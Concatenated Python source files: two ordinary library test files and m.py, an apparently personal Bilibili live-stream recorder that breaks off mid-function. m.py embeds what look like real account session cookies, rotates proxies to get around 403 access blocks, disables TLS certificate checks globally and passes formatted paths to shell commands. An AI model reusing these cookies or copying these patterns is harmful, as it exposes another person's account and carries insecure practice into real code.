self.queue = Queue()
self.process = Process(target=self._update, daemon=True)
self.process.start()
def _update(self):
while True:
try:
res = self.queue.get()
if res is None: break
update_iters, snapshot = res
self.bar.update(update_iters, current_iter=update_iters, snapshot=utils.dict_to_params_str(snapshot, auto=False, sep=", "))
if self.board_writer is not None:
self.board_writer.add_scalars("lr_finder_scalar_group", snapshot, update_iters)
except BaseException as e:
self.bar.finish()
if not isinstance(e, KeyboardInterrupt):
traceback.print_exc()
sys.exit(1)
def update(self, update_iters: int, snapshot: dict):
self.queue.put((update_iters, snapshot))
def finish(self):
self.queue.put(None)
self.bar.finish()
|
test_serialize.py
|
# Copyright (c) 2018, NVIDIA CORPORATION.
import sys
import multiprocessing as mp
import numpy as np
import pandas as pd
from numba import cuda
try:
from distributed.protocol import serialize, deserialize
_have_distributed = True
except ImportError:
_have_distributed = False
import pytest
import pygdf
from . import utils
require_distributed = pytest.mark.skipif(not _have_distributed,
reason='no distributed')
support_ipc = sys.platform.startswith('linux') and hasattr(mp, 'get_context')
require_ipc = pytest.mark.skipIf(
support_ipc,
reason='only on linux and multiprocess has .get_context',
)
@require_distributed
def test_serialize_dataframe():
df = pygdf.DataFrame()
df['a'] = np.arange(100)
df['b'] = np.arange(100, dtype=np.float32)
df['c'] = pd.Categorical(['a', 'b', 'c', '_', '_'] * 20,
categories=['a', 'b', 'c'])
outdf = deserialize(*serialize(df))
pd.util.testing.assert_frame_equal(df.to_pandas(), outdf.to_pandas())
@require_distributed
def test_serialize_dataframe_with_index():
df = pygdf.DataFrame()
df['a'] = np.arange(100)
df['b'] = np.random.random(100)
df['c'] = pd.Categorical(['a', 'b', 'c', '_', '_'] * 20,
categories=['a', 'b', 'c'])
df = df.sort_values('b')
outdf = deserialize(*serialize(df))
pd.util.testing.assert_frame_equal(df.to_pandas(), outdf.to_pandas())
@require_distributed
def test_serialize_series():
sr = pygdf.Series(np.arange(100))
outsr = deserialize(*serialize(sr))
pd.util.testing.assert_series_equal(sr.to_pandas(), outsr.to_pandas())
@require_distributed
def test_serialize_range_index():
index = pygdf.index.RangeIndex(10, 20)
outindex = deserialize(*serialize(index))
assert index == outindex
@require_distributed
def test_serialize_generic_index():
index = pygdf.index.GenericIndex(pygdf.Series(np.arange(10)))
outindex = deserialize(*serialize(index))
assert index == outindex
@require_distributed
def test_serialize_masked_series():
nelem = 50
data = np.random.random(nelem)
mask = utils.random_bitmask(nelem)
bitmask = utils.expand_bits_to_bytes(mask)[:nelem]
null_count = utils.count_zero(bitmask)
assert null_count >= 0
sr = pygdf.Series.from_masked_array(data, mask, null_count=null_count)
outsr = deserialize(*serialize(sr))
pd.util.testing.assert_series_equal(sr.to_pandas(), outsr.to_pandas())
@require_distributed
def test_serialize_groupby():
df = pygdf.DataFrame()
df['key'] = np.random.randint(0, 20, 100)
df['val'] = np.arange(100, dtype=np.float32)
gb = df.groupby('key')
outgb = deserialize(*serialize(gb))
got = gb.mean()
expect = outgb.mean()
pd.util.testing.assert_frame_equal(got.to_pandas(), expect.to_pandas())
@require_distributed
@require_ipc
def test_serialize_ipc():
sr = pygdf.Series(np.arange(10))
# Non-IPC
header, frames = serialize(sr)
assert header['column']['data_buffer']['kind'] == 'normal'
# IPC
hostport = 'tcp://0.0.0.0:8888'
fake_context = {
'recipient': hostport,
'sender': hostport,
}
assert sr._column.data._cached_ipch is None
header, frames = serialize(sr, context=fake_context)
assert header['column']['data_buffer']['kind'] == 'ipc'
# Check that _cached_ipch is set on the buffer
assert isinstance(sr._column.data._cached_ipch,
cuda.cudadrv.devicearray.IpcArrayHandle)
# Spawn a new process to test the IPC handle deserialization
mpctx = mp.get_context('spawn')
result_queue = mpctx.Queue()
proc = mpctx.Process(target=_load_ipc, args=(header, frames, result_queue))
proc.start()
out = result_queue.get()
proc.join(3)
# Verify that the output array matches the source
np.testing.assert_array_equal(out.to_array(), sr.to_array())
def _load_ipc(header, frames, result_queue):
try:
out = deserialize(header, frames)
result_queue.put(out)
except Exception as e:
result_queue.put(e)
@require_distributed
def test_serialize_datetime():
# Make frame with datetime column
df = pd.DataFrame({'x': np.random.randint(0, 5, size=20),
'y': np.random.normal(size=20)})
ts = np.arange(0, len(df), dtype=np.dtype('datetime64[ms]'))
df['timestamp'] = ts
gdf = pygdf.DataFrame.from_pandas(df)
# (De)serialize roundtrip
recreated = deserialize(*serialize(gdf))
# Check
pd.util.testing.assert_frame_equal(recreated.to_pandas(), df)
|
test_remote.py
|
import threading
import time
import unittest
from jina.logging import get_logger
from jina.main.parser import set_gateway_parser, set_pea_parser
from jina.peapods.pod import GatewayPod
from jina.peapods.remote import PeaSpawnHelper
from tests import JinaTestCase
class MyTestCase(JinaTestCase):
def test_logging_thread(self):
_event = threading.Event()
logger = get_logger('mytest', event_trigger=_event)
def _print_messages():
while True:
_event.wait()
print(f'thread: {_event.record}')
print(type(_event.record))
_event.clear()
t = threading.Thread(target=_print_messages)
t.daemon = True
t.start()
logger.info('blah, blah')
logger.info('blah, blah, blah')
time.sleep(.1)
logger.warning('warn, warn, warn')
time.sleep(.1)
logger.debug('warn, warn, warn')
time.sleep(.1)
logger.success('crit')
time.sleep(.1)
def tearDown(self) -> None:
time.sleep(2)
super().tearDown()
def test_remote_not_allowed(self):
f_args = set_gateway_parser().parse_args([])
p_args = set_pea_parser().parse_args(['--host', 'localhost', '--port-expose', str(f_args.port_expose)])
with GatewayPod(f_args):
PeaSpawnHelper(p_args).start()
def test_cont_gateway(self):
f1_args = set_gateway_parser().parse_args(['--allow-spawn'])
f2_args = set_gateway_parser().parse_args([])
with GatewayPod(f1_args):
pass
with GatewayPod(f2_args):
pass
if __name__ == '__main__':
unittest.main()
|
m.py
|
#! /usr/bin/env python3
# -*- coding: UTF-8 -*-
#import tracemalloc
#tracemalloc.start()
import os, sys,asyncio,concurrent,functools,shutil
#import uvloop
#asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
os.system('cd /root/b/d;mv *.flv /root/b/d/bu/')
from os.path import split, join, exists, abspath, isdir, expanduser
import re
#import logging
import json
import threading
import urllib.request
import urllib.error
from urllib.request import urlopen#, Request
import time
import io
import socket
socket.setdefaulttimeout(10)
import subprocess
import argparse
import http.client
import configparser,traceback
from mail import send_mail
import toml
import gc
import queue as Queue
password = input('password:')
testt = input('test?')
ROOMS = '';
USERS = '';
FILEDIR = '';
#DEBUGLEVEL = logging.INFO;
SCRIPT = '';
COMMAND = '';
INTERVAL = 5;
ipnum = 0;
recording = []
mvselect=1
cookies = {}
access_key = ''
sApi0 = 'http://space.bilibili.com/ajax/live/getLive?mid={}'
sApi1 = 'http://live.bilibili.com/api/player?id=cid:{}';
sApi2 = 'http://live.bilibili.com/live/getInfo?roomid={}'; # obsolete
sApi3 = 'http://live.bilibili.com/api/playurl?cid={}'; # obsolete
sAPI4 = 'https://api.live.bilibili.com/room/v1/Room/room_init?id={}'
sApi5 = 'http://api.live.bilibili.com/room/v1/Room/get_info?room_id={}'
sApi6 = 'http://api.live.bilibili.com/live_user/v1/UserInfo/get_anchor_in_room?roomid={}'
sApi7 = 'http://api.live.bilibili.com/api/playurl?cid={}&otype=json&quality=0&platform=web'
sApi8 = 'http://api.live.bilibili.com/room/v1/Room/playUrl?cid={}&otype=json&platform=web&qn=4'
headers={
"Connection":"close",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36",
"Accept":"*/*",
"Referer":"https://space.bilibili.com/1836737/fans/follow",
"Accept-Encoding":"gzip, deflate, br",
"Accept-Language":"zh-CN,zh;q=0.9,ja;q=0.8",
"Cookie":"buvid3=DF8F84B3-B90F-4D48-AF16-6ECF24C8BAA540777infoc; LIVE_BUVID=AUTO2015577399215380; sid=6znidvkl; DedeUserID=1836737; DedeUserID__ckMd5=326caeb00bc9daa3; SESSDATA=34f5f194%2C1560331941%2C35fcf151; bili_jct=9c0eebb9461bc14a8c855818a27b48c6; _dfcaptcha=b761810cd8d5d6835ab4d99a536ac018"
}
aRooms = [];
sHome = '';
sSelfDir = '';
sLogDir = '';
log = None;
sleepEvent = None;
wait = None;
selectip = None
vfs=os.statvfs("/root")
available=vfs.f_bavail*vfs.f_bsize/(1024*1024*1024)
import requests
import random
ii=0
import ssl
from multiprocessing import Process, Value
upwork = Value("d",0)
sys.path.append('/root/u')
#from getip import *
ssl._create_default_https_context = ssl._create_unverified_context
#logging.basicConfig(format=' %(asctime)s %(levelname)-5s: %(message)s', datefmt='%Y-%m-%d %H:%M:%S');
#log = logging.getLogger(__name__);
#log.setLevel(DEBUGLEVEL);
sleepEvent = threading.Event();
wait = sleepEvent.wait;
ss = requests.session()
ss.keep_alive = False
def delete_proxy(proxy):
with requests.get("http://127.0.0.1:5010/delete/?proxy={}".format(proxy)) as r:
print(r.text)
def get_proxy():
while True:
try:
with ss.get("http://127.0.0.1:5010/get",timeout=20) as r:
ip = r.json().get("proxy")
return ip
except:
time.sleep(0.1)
proxyg={'http':get_proxy()}#getip('国内')
streamip = []
allips = []
def prepare(room,s=None):
global sHome
global sSelfDir
global sLogDir
global log
global sleepEvent
global wait
global ii
global ipnum
'''
config = configparser.ConfigParser()
config.read(sys.path[0] + "/proxy.ini")
try:
sourceip = socket.gethostbyname(config.get('proxy','ip'))
r = requests.get('http://%s:8765/?count=1000&protocol=1' % sourceip,timeout=10)
except Exception as e:
sourceip = "127.0.0.1"
r = requests.get('http://%s:8765/?count=1000&protocol=1' % sourceip,timeout=10)
try:
ip_ports = json.loads(r.text)
except Exception as e:
print(e)
time.sleep(0.1)
prepare(room)
return
print("数量:")
print(len(ip_ports))
ipnum=int(len(ip_ports))
try:
ip = ip_ports[ii][0]
except Exception as e:
print(e)
try:
r = requests.get('http://%s:8765/?count=1000&protocol=1' % sourceip,timeout=10)
ip = ip_ports[ii][0]
except Exception as e:
ii += 1
if(ii>=ipnum):
ii=0
prepare(room)
return
port = ip_ports[ii][1]
proxies={'https':'%s:%s'%(ip,port)}
print('取用第{}个IP地址:{}\n'.format(ii+1,proxies))
ii += 1
if(ii>=ipnum):
ii=0
'''
while True:
try:
#r = ss.get('http://127.0.0.1:5010/get',timeout = 20)
room.ip=ip = get_proxy()
break
except Exception as e:
print(e)
time.sleep(1)
if s=='s':
proxies={'https':ip}
elif s =='国内':
pass#proxies=getip(s)
else:
proxies = {'http':ip}#,'https':ip}
#proxies=getip('s')
print(proxies)
proxy_support = urllib.request.ProxyHandler(proxies)
sHome = expanduser('~')
sSelfDir = split(__file__)[0];
#sLogDir = join(sSelfDir, 'multilisten.log.d');
#logging.basicConfig(format=' %(asctime)s %(levelname)-5s: %(message)s', datefmt='%Y-%m-%d %H:%M:%S');
#log = logging.getLogger(__name__);
#log.setLevel(DEBUGLEVEL);
sleepEvent = threading.Event();
wait = sleepEvent.wait;
opener = urllib.request.build_opener(proxy_support);
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36')];
#urllib.request.install_opener(opener);
room.urlopen=opener.open
socket.setdefaulttimeout(30);
#prepare();
#os.system("apt install -y yamdi ffmpeg libffi-dev libssl-dev")
def display(*args, **kargs):
try:
print(*args, **kargs);
except UnicodeEncodeError as e:
sEnc = sys.stdout.encoding;
args = (str(x).encode(sEnc, 'replace').decode(sEnc) for x in args);
print(*args, **kargs);
class Room():
def __init__(self, nRoom=None, nUser=None,sUser=None,sTitle=None,sUrl=None):
global log
self.nRoom = int(nRoom or 0);
self.nUser= int(nUser or 0);
self.nId = int(nRoom or 0);
self.aurl = None
self.aurlc = 0
self.sUrl = sUrl;
self.burl = None;
self.curl = None;
self.durl = None
self.sTitle = sTitle;
self.sUser = sUser;
self.sStatus = None;
self._stream = io.StringIO();
self.thread = None;
self.checkthread = None;
self.ii = 1;
self.sameid = 1;
self.ex = 0;
self.urlopen = None;
self.ip = None
self.time = 0
#print({key: value for key, value in vars(self).items() if not key.startswith('_') and value});
def getRoomByUser(self):
assert self.nUser;
try:
res0 = self.urlopen(sApi0.format(self.nUser));
sData = res0.read().decode('utf-8');
assert sData;
mData = json.loads(sData);
if (mData['status']):
self.nId = self.nRoom = int(mData['data']);
return True;
else:
display('不存在的播主: ', self.nUser);
return False;
finally:
if ('res0' in locals()): res0.close();
def getRealId(self):
global log
try:
#sUrl = 'http://live.bilibili.com/{}'.format(self.nRoom);
#res = urlopen(sUrl);
#bData = res.read(5000);
#match = re.search(rb'var ROOMID = (\d+);', bData);
#if (match):
# nId = int(match.group(1));
#else:
# nId = self.nRoom;
res1 = self.urlopen(sAPI4.format(self.nRoom));
bData = res1.read();
mData = json.loads(bData.decode());
nId = mData['data']['room_id'];
except urllib.error.HTTPError as e:
if (e.code == 404):
print('room {} not exists'.format(self.nRoom));
return False
else:
delete_proxy(self.ip)
raise
else:
self.nId = nId;
return True
finally:
if ('res1' in locals()): res1.close();
def getHost(self):
if (self.sUser is None):
try:
print(self.nId,"getHost")
f11 = self.urlopen(sApi6.format(self.nId));
bData = f11.read();
mData = json.loads(bData.decode());
Username = mData['data']['info']['uname'];
rstr = r"[\/\\\:\*\?\"\<\>\|\- ]"
self.sUser = re.sub(rstr,"_",Username)
except Exception as e:
display('获取播主失败: ', e);
prepare(self)
self.getHost()
#self.sUser = '';
finally:
if ('f11' in locals()): f11.close();
rstr = r"[\/\\\:\*\?\"\<\>\|\- ]"
self.sUser = re.sub(rstr,"_",self.sUser)
def getInfo(self,g=None):
global log
global sApi5, sApi6
while True:
try:
if (self.nId is None): self.getRealId();
if not self.sTitle or g:
print(self.nId,"getInfo")
res2 = self.urlopen(sApi5.format(self.nId),timeout=10);
sRoomInfo = res2.read().decode('utf-8');
mData = json.loads(sRoomInfo);
self.sTitle = sTitle = mData['data']['title'];
self.getHost();
rstr = r"[\/\\\:\*\?\"\<\>\|\-\. ]"
self.sTitle = re.sub(rstr,"_",self.sTitle)
nStatus = 1#mData['data']['live_status'];
_status = 'on' if nStatus == 1 else 'off';
self.sStatus = _status;
except Exception as e:
print('failed to get room info: {}'.format(e));
traceback.print_exc()
prepare(self);
#raise;
else:
return _status;
finally:
if ('res2' in locals()): res2.close();
def getStream(self):
#global sApi3
#with urlopen(sApi3.format(self.nId)) as res:
# sData = res.read().decode('utf-8');
#iMatches = re.finditer(r'<(?:b\d)?url><!\[CDATA\[(.+)\]\]><\/(?:b\d)?url>', sData);
#aMatches = list(iMatches);
#if (aMatches):
# self.aUrls = [x.group(1) for x in aMatches];
# sUrl = self.sUrl = self.aUrls[0];
# return sUrl;
#else:
# return False;
global sApi8#selectip
self.time = time.time()
trytimes = 10
if self.sUrl:
return True
else:
print(self.sUser,"开始未能获得url,用备用方法获取")
'''
if self.nId == 151159:
proxies = None
else:
'''
def newip():
print('streamip:',len(streamip))
while not streamip:
time.sleep(1)
selectip = streamip[random.randint(0,len(streamip)-1)]
proxies={'http':selectip,'https':selectip}#getip('国内')
return selectip,proxies
#print(self.nRoom,'getStream',proxies)
while trytimes:
selectip,proxies = newip()
try:
with requests.get(sApi8.format(self.nId),timeout=5,proxies=proxies) as res:
sData=res.json()
mData = sData['data']
if not mData['accept_quality']:
raise Exception("调用出错")
#mData = json.loads(sData);
durl = mData['durl']
n = 0
for i in durl:
url = i['url']
if 'live-bvc' in url:
self.aurl = url
elif 'live-js' in url:
self.burl = url
elif 'live-txy' in url:
self.curl = url
elif 'live-ws' in url:
self.durl = url
n+=1
if n == len(durl):
raise "live-ws"
self.ip = selectip
print(self.sUser,"获取url成功")
if not selectip in streamip:
streamip.append(selectip)
print(streamip)
return 1;
#sData = res.read().decode('utf-8');
except Exception as e:
#delete_proxy(ip)
if 'ss' in locals():
ss.close()
print(self.sUser,'获取url失败')
if selectip in streamip:
streamip.remove(selectip)
#traceback.print_exc()
trytimes -=1
#prepare(self,'国内')
#mData = json.loads(sData);
return False
def download(self, sPath, stream=sys.stdout, nVerbose=1):
sDir = expanduser(FILEDIR) or sHome;
def adaptName(sPath):
if (os.path.exists(sPath)):
sName, sExt = os.path.splitext(sPath)
i = 1;
sOutPath = '{}{}{}'.format(sName, i, sExt);
while os.path.exists(sOutPath):
i += 1;
sOutPath = '{}{}{}'.format(sName, i, sExt);
else:
sOutPath = sPath;
return sOutPath;
def newName():
sTime = time.strftime('%y%m%d_%H%M%S');
sName = '{}-{}-{}.flv'.format(sTime, self.sUser, self.sTitle);
sName = re.sub(r'[^\w_\-.()]', '_', sName);
sPath = os.path.join(sDir,sName)
return sPath
proxyg = {};
selectip = None
def newdown(proxyg = proxyg,selectip=selectip,pro = 0):#pro:是否代理
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36', 'Referer': 'https://live.bilibili.com/{}'.format(self.nId)}
if not proxyg and pro:
proxyg['https']=selectip
proxyg['http']=selectip
#proxyg = {'http':'34.92.99.59:3247'}
timeout = 5
hasproxy = 0
while 1:
try:
if self.burl:
if hasproxy:
proxyg = {'http':'34.92.3.74:3654'}
else:
proxyg = 0
sUrl = self.sUrl = self.burl
#self.burl = 0
elif self.curl:
if hasproxy:
proxyg = {'http':self.ip}
else:
proxyg = 0
sUrl = self.sUrl = self.curl
elif self.aurl:
if self.aurlc:
proxyg = 0
else:
proxyg = {'http':self.ip}
sUrl = self.sUrl = self.aurl
elif self.durl:
if hasproxy:
proxyg = {'http':self.ip}
else:
proxyg = 0
sUrl = self.sUrl = self.durl
else:
print(self.sUser,"无 url")
yield None
if testt:
print(f'\r\033[K{sUrl}')
with requests.get(sUrl,stream = True,timeout = timeout,headers=headers,proxies=proxyg,allow_redirects = False) as r:
if r.status_code == 200:
if 'live-bvc' in sUrl and not self.aurlc:
self.aurlc = 1
continue
for chunk in r.iter_content(chunk_size=1024*8):
if chunk:
yield chunk
else:
yield None
'''
if self.burl:
self.burl = 0
elif self.aurl:
self.aurl = 0
elif self.curl and not hasproxy:
hasproxy = 1
else:
break
'''
elif r.status_code == 302:
self.aurl = r.headers.get("Location")
self.aurlc = 1
elif r.status_code == 403:
if self.burl:
if not hasproxy:
hasproxy = 1
print(self.sUser,'使用代理')
else:
print(self.burl,'403')
print(self.burl,' 403')
self.burl = 0
elif self.curl:
if not hasproxy:
hasproxy = 1
print(self.sUser,'使用代理')
else:
print(self.curl,' 403')
self.curl = 0
if self.ip in streamip:
streamip.remove(self.ip)
elif self.durl:
if not hasproxy:
hasproxy = 1
print(self.sUser,'使用代理')
else:
print(self.durl,' 403')
self.durl = 0
if self.ip in streamip:
streamip.remove(self.ip)
else:
break
elif r.status_code == 404:
if self.burl:
break
self.burl = 0
elif self.curl:
break
self.aurl = 0
else:
break
else:
break
except Exception as e:
if "timed" in str(e) or "refused" in str(e):
if not hasproxy:
break#hasproxy=1
else:
break
else:
print('newdown 的错误是',e)
traceback.print_exc()
break
if not 'r' in locals():
print('url 未接通')
yield None
if r.status_code !=200:
print(sUrl,' get error',r.status_code)
yield None
sUrl = self.sUrl;
bBuffer = ''
data = ''
if True:
try:
headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0'}
raise Exception('403')
req=urllib.request.Request(sUrl,headers=headers)
r=urlopen(req)
#r = urlopen(sUrl, timeout=4)
except Exception as e:
#print(self.sUser,e,'主线中断,切换备线\n')
#aaaa=self.getStream()
#if aaaa:
# sUrl = self.ssUrl
#else:
# return False,sPath
'''
while True:
try:
r = urlopen(sUrl, timeout=20)
except Exception as e:
print(e)
if "403" in str(e):
print(self.sUser,'被拒,继续尝试')
else:
break
'''
try:
if '4' in str(e):
data = newdown()
if data:
bBuffer = data.__next__()
else:
return False,sPath
else:
r = urlopen(sUrl, timeout=5)
except Exception as e:
traceback.print_exc();
print(self.sUser,e,'失败\n')
return False,sPath
'''
sUrl = self.ssUrl
try:
r=urlopen(sUrl,timeout=5)
except Exception as e:
print(e)
return False,sPath
'''
except socket.timeout as e:
print(e)
return False,sPath
else:
pass
sPath = newName();
sPath = adaptName(sPath);
#iUrls = iter(aUrl);
#sUrl = next(iUrls);
try:
if bBuffer:
f1 = open(sPath, 'wb');
self.time = round(time.time()-self.time,2)
print('sec[{}]'.format(self.time),'{} starting download from:\n{}\n to:\n{}'.format(self.nId, self.sUrl, sPath));
if (nVerbose):
stream.write('\n');
nSize = 0;
n = 1024*1024;
readbuffer = 1024*8
limitsize = 1024*1024*1024
tnumber = 0
#vfs=os.statvfs("/root")
#available=vfs.f_bavail*vfs.f_bsize/(1024*1024*1024)
#stream.write('\r剩余空间%.2f\n' % (available))
while bBuffer:
nSize += f1.write(bBuffer);
#f1.flush()
#if (nVerbose):
#stream.write('\r{:<4.2f} MB downloaded'.format(nSize/n));
#tnumber+=1
#if (tnumber>=200):
#break
#vfs=os.statvfs("/root")
#available=vfs.f_bavail*vfs.f_bsize/(1024*1024*1024)
#stream.write('剩余空间%.2f\n' % (available))
#tnumber = 0
if (nSize >= limitsize and self.nId != 151159):
print('%s 大小到达限制,进行存储' % sPath)
if 'r' in locals():
print("关闭上一个链接")
r.close()
nSize = 0
f1.close()
upload(sPath)
'''
sTime = time.strftime('%y%m%d_%H%M%S');
sName = '{}-{}-{}.flv'.format(sTime, self.sUser, self.sTitle);
sName = re.sub(r'[^\w_\-.()]', '_', sName);
sPath = os.path.join(sDir,sName)
'''
sPath = newName()
f1 = open(sPath,'wb')
data = newdown()
#if (self.ii == 0 and available>25):
# self.ii = 1
#if (available<15 and (self.ii == 1 and self.nId !=151159)):
# self.ii = 0
# print('剩余空间不足,进行存储\n')
# stillrec = 1
# break
if data:
bBuffer = data.__next__()
else:
bBuffer = res.read(readbuffer);
trytry=0
waittime = 0.2
'''
while not bBuffer and trytry <2:
time.sleep(waittime)
try:
#res = urlopen(sUrl, timeout=25);
data=newdown()
except:
break
bBuffer = data.__next__()
#bBuffer = res.read(1024*128);
trytry+=1
waittime+=0.1
'''
#if (nVerbose):
#stream.write('\n');
except StopIteration:
print('{} 数据流结束'.format(self.sUser))
except socket.timeout as e:
print('{} donwloading timeout'.format(self.nId));
except ConnectionResetError as e:
print('downloading reset: {}'.format(e));
except http.client.IncompleteRead as e:
print('downloading break:{}'.format(e));
except:
traceback.print_exc()
finally:
if ('res' in locals()):
res.close();
if ('r' in locals()):
r.close();
if ('f1' in locals()): f1.close();
if (os.path.isfile(sPath) and os.path.getsize(sPath) < 1024*1024):
os.remove(sPath);
return False,None;
return True,sPath;
def doCleanup(room, sPath, sScript=None, sCom=None, sLogFile=None):
# execute external script
# maybe in a new thread
global COMMAND, SCRIPT
global log
global sSelfDir
global sLogDir
sScript = (sScript or SCRIPT or '').strip();
sCom = (sCom or COMMAND or '').strip();
sLogFile = '{}.log'.format(room.nId);
if (sLogDir):
if (not exists(sLogDir)):
os.mkdir(sLogDir);
if (isdir(sLogDir)):
sLogFile = join(sLogDir, sLogFile);
else:
sLogFile = os.devnull;
else:
sLogFile = os.devnull;
try:
file = open(sLogFile, 'a');
if (sScript):
sScriptOri = sScript;
if (not exists(sScript)):
sScript = join(sSelfDir, sScriptOri);
sScript = abspath(sScript);
try:
subprocess.Popen(
[sys.executable, sScript, sPath],
stdout=file,
stderr=subprocess.STDOUT
);
except FileNotFoundError as e:
print('executing script {} failed: {}'.format(sScript, e));
else:
print(r'executing cleanup script "{}" with file "{}", logging to "{}"'
.format(sScript, sPath, sLogFile)
);
if (sCom):
sCom = sCom.format(sPath);
try:
subprocess.Popen(
sCom,
stdout=file,
stderr=subprocess.STDOUT,
shell=True
);
except FileNotFoundError as e:
print('executing command {} failed: {}'.format(sCom, e));
else:
print(r'execute cleanup command "{}", logging to "{}"'
.format(sCom, sLogFile)
);
finally:
if ('file' in locals()): file.close();
return True;
def upload(sPath):
global mvselect
if(not os.path.exists('/root/b/d/bu')):
os.makedirs('/root/b/d/bu')
if mvselect==1:
shutil.move(sPath,'/root/b/d/bu')
mvselect+=1
elif mvselect==2:
shutil.move(sPath,'/root/b/d/bu/bt')
mvselect+=1
elif mvselect>=3:
shutil.move(sPath,'/root/b')
mvselect=1
#exit()
'''
jishu=0;
change ='waitting'+sName
cPath = os.path.join(sDir, change)
#global upwork
while upwork.value>1:
time.sleep(random.randint(0,20))
upwork.value += 1
os.system('ffmpeg -i "{}" -y -vcodec copy -acodec copy "{}"'.format(sPath,cPath))
os.system('rm -rf "{}"'.format(sPath))
os.system('yamdi -i "{}" -o "{}"'.format(cPath,sPath))
os.system('rm -rf "{}"'.format(cPath))
#upwork.value -= 1
while True:
wait(0.5);
if(not room.sUser):
room.getHost()
sPaths=re.split(r'[-]{2}',sPath)
if(len(sPaths)==2):
nPath=sPaths[0]+'-'+room.sUser+'-'+sPaths[1]
os.system('mv "{}" "{}"'.format(sPath,nPath))
sPath = nPath
os.system('rclone move "{}" milo:milo/b/"{}"'.format(sPath,room.sUser));
if(not exists(sPath)):
print('{}存储成功..'.format(sName));
if(room.ii == 0):
room.ii = 1
break;
else:
if(jishu>=10):
print('重试多次失败,请手动检查');
with open('/root/names.txt','a') as f:
f.writelines(sName);
f.write('\n')
f.close;
break;
jishu+=1;
print('存储失败,重新存储..\n')
time.sleep(5)
upwork.value -= 1
'''
def doDownload(room):
global mvselect
global FILEDIR, sHome;
global wait;
global sLogDir;
sDir = expanduser(FILEDIR) or sHome;
sTime = time.strftime('%y%m%d_%H%M%S');
sName = '{}-{}-{}.flv'.format(sTime, room.sUser, room.sTitle);
sName = re.sub(r'[^\w_\-.()]', '_', sName);
if (not exists(sDir)):
os.makedirs(sDir);
assert isdir(sDir);
sPath = os.path.join(sDir, sName);
isSuccess = room.getStream();
if (isSuccess):
isSuccess,sPath = room.download(sPath, room._stream)
if (isSuccess):
print('{} downloaded to {}'.format(room.nId, sPath));
try:
#downThread = threading.Thread(
# target=upload,
# name=str(room.nId),
# args=(room,sPath,sName,sDir,),
# daemon=True
# );
# downThread.start();
'''
p = Process(target=upload, args=(room,sPath,sName,sDir,upwork,))
print('Child process will start.')
p.start()
'''
if os.path.exists(sPath):
upload(sPath)
except Exception as e:
if (sLogDir):
if (not exists(sLogDir)):
os.mkdir(sLogDir);
if (isdir(sLogDir)):
sLogFile = 'threaderror.log'
sLogFile = join(sLogDir, sLogFile);
with open(sLogFile, 'a') as file:
file.write('\n{}:\n {}\n'.format(time.ctime(), e));
print('error "{}" is logged to file "{}"'
.format(e, sLogFile)
);
raise
#wait(2);
room._stream.seek(0);
room._stream.truncate();
print('{} download thread ended'.format(room.nId));
#os.system('rclone move {} milo:milo/b'.format(sDir));
return True;
def checkuser():
global aRooms
while True:
#print('check run')
for i in open("user.txt","r").read().splitlines():
if(i):
sameid = 0
for room in aRooms:
if(int(i) == room.nRoom):
sameid =1
room.ex = 1
#room.sameid = 1
break
if(sameid == 1):
continue
else:
print('find new id:%s.' % i)
room = Room(int(i));
room.sameid = 1
room.ex = 1
#room.getInfo();
aRooms.append(room)
for room in aRooms:
if(room.ex == 0):
print("{}end".format(room.nRoom))
aRooms.remove(room)
room.sameid = 0
room.ex = 0
time.sleep(5)
def synMonitor(aIds=None, aUsers=None):
global log
global wait
global aRooms;
global INTERVAL;
if (not aIds): aIds = [];
if (not aUsers): aUsers = [];
aRooms = [];
if (not os.path.exists('user.txt')):
with open("user.txt","a") as f:
for sId in aIds:
sId = sId.strip();
if (sId):
f.writelines(sId)
f.write('\n')
f.close
else:
for sId in aIds:
sId = sId.strip();
if (sId):
sameid = 0
for i in open("user.txt","r").read().splitlines():
if (i == sId):
sameid = 1
break
if(sameid == 1):
continue
else:
with open("user.txt","a") as r:
r.writelines(sId)
r.write('\n')
r.close
for sId in open("user.txt","r").read().splitlines():
sId = sId.strip();
if (sId):
room = Room(int(sId));
#room.getInfo();
aRooms.append(room);
for sUser in aUsers:
sUser = sUser.strip();
if (sUser):
room = Room(None, int(sUser));
if (room.getRoomByUser()):
room.getInfo();
aRooms.append(room);
#for room in aRooms:
#display('id: {}\nUser: {}\nroom: {}\nstatus: {}\n'.format(room.nId, room.sUser, room.sTitle, room.sStatus))
print('check interval: {}s'.format(INTERVAL));
ck = threading.Thread(target=checkuser,name=("check"),daemon=True)
ck.start()
while True:
for room in aRooms:
if(room.checkthread and room.checkthread.is_alive()):
pass
else:
print('new checkthread {} running'.format(room.nRoom))
checkThread = threading.Thread(target=checkrun,
name=str(room.sUser),
args=(room,),
daemon=True
)
room.checkthread=checkThread
checkThread.start()
wait(INTERVAL);
def checkrun(room):
if str(room.nRoom) in recording:
return
recording.append(str(room.nRoom))
#x = 1
#prepare(room)
isOn = (room.getInfo() == 'on');
display('id: {}\nUser: {}\nroom: {}\nstatus: {}\n'.format(room.nId, room.sUser, room.sTitle, room.sStatus))
'''
if (room.thread and room.thread.is_alive()):
sProcess = room._stream.getvalue();
print('{} downloading process: {}'.format(room.nId, sProcess));
'''
if(room.sameid == 0):
return
#if(isOn and x==1):
# x=0
#else:
# isOn = (room.getInfo() == 'on');
if(isOn):
print('{} starting download process...'.format(room.nId));
'''
downThread = threading.Thread(
target=doDownload,
name=str(room.nId),
args=(room,),
daemon=True
);
room.thread = downThread;
downThread.start();
'''
doDownload(room)
if str(room.nRoom) in recording:
recording.remove(str(room.nRoom))
else:
if str(room.nRoom) in recording:
recording.remove(str(room.nRoom))
gc.collect()#pass
def newgetonline():
global cookies
count = 0
firstnew=1
s=requests.session()
s.keep_alive = False
